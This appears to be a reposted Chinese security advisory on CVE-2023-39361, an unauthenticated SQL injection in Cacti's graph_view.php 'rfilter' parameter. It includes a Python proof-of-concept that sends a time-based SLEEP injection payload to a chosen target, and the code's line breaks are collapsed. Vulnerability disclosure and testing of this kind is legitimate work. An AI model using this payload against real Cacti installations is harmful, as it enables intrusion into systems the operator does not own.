CVE-2023-39361|Cacti 未经身份验证SQL注入漏洞

admin 2023年9月7日17:36:21评论133 views字数 1419阅读4分43秒阅读模式



0x00 前言


Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。

Cacti是通过 snmpget来获取数据,使用 RRDtool绘画图形,而且你完全可以不需要了解RRDtool复杂的参数。



0x01 漏洞描述


漏洞存在于从graph_view.php文件调用的growt_right_pane_tree函数中。


在tree_content的情况下,通过html_validate_tree_vars函数验证用户输入,随后,如果tree_id参数大于0,则调用growt_right_pane_tree函数。



0x02 CVE编号


CVE-2023-39361



0x03 影响版本


Cacti<=1.2.24



0x04 测试POC


import argparseimport requestsimport sysimport urllib3

#import os#os.environ['http_proxy'] = 'http://localhost:8080'

sleep_time = 10payload = f""""OR ""="(("));SELECT SLEEP({sleep_time});-- -"""

def exploit(): url = f"{target}/graph_view.php"

params = { "action":"tree_content", "node":"1-1-tree_anchor", "rfilter":payload }

print('[+] Sending payload...') print(f"[+] Payload: {payload}") session.get(url,params=params) if __name__=='__main__': urllib3.disable_warnings() parser = argparse.ArgumentParser(description="Cacti 1.2.24 - graph_view.php 'rfilter' SQL Injection (guest access)") parser.add_argument('-t','--target',help='',required=True) args = parser.parse_args() target = args.target session = requests.Session()

exploit()



CVE-2023-39361|Cacti 未经身份验证SQL注入漏洞




0x05 参考链接


https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg



推荐阅读:


CVE-2023-34039|VMware Aria Operations for Networks身份认证绕过漏洞


CVE-2023-40595|Splunk Enterprise 远程代码执行漏洞


CVE-2023-38286|Spring Boot Admin 远程代码执行漏洞




Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持CVE-2023-39361|Cacti 未经身份验证SQL注入漏洞!!!



      本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。

CVE-2023-39361|Cacti 未经身份验证SQL注入漏洞


原文始发于微信公众号(信安百科):CVE-2023-39361|Cacti 未经身份验证SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月7日17:36:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-39361|Cacti 未经身份验证SQL注入漏洞https://cn-sec.com/archives/2014771.html

发表评论

匿名网友 填写信息